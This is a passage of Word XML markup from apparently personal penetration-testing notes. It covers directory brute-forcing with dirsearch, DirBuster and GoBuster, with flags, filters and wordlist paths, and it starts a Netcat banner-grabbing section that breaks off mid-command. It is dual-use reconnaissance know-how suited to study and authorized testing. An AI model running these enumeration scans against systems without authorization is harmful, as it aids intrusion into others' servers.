      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dirsearch -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e php,txt</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only include specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">status codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--include-status=200,403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">status codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-status=404,302</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">response sizes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-sizes=0,88,1024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude responses containing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific text</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., wildcard error messages)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-text="404 Not Found"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude responses with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific content types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-content=application/json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove automatic extensions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (useful for wildcard filtering)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--remove-extensions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E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9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wwqdq3sq3vbf" w:id="148"/>
      <w:bookmarkEnd w:id="148"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DirBuster</w:t>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t xml:space="preserve">If you want a GUI that also allows for recursion, then use dirbuster. You can open it via this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dirbuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011ED">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E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F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ja7q5gchwzr7" w:id="149"/>
      <w:bookmarkEnd w:id="149"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GoBuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide on GoBuster (good for mainly directory enumeration):</w:t>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t xml:space="preserve">Simple command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir -u http://[IP] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x php,html,txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to specify file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-b 404</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to avoid common error messages to make output cleaner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o gobuster_results.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to save to file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="465"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" for recursive so that it digs deeper in subdirectories</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding cookies (same as ffuf):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some other words lists include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001201">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001202">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster/directory-list-2.3-big.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001203">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001204">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001206">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012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08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001209">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_czod8yv3ehtm" w:id="150"/>
      <w:bookmarkEnd w:id="150"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat (nc)</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use netcat to connect to random TCP ports and try interacting with it or just see if there are any banners or errors that give you more info. And copy and paste any output into Google:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-nv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
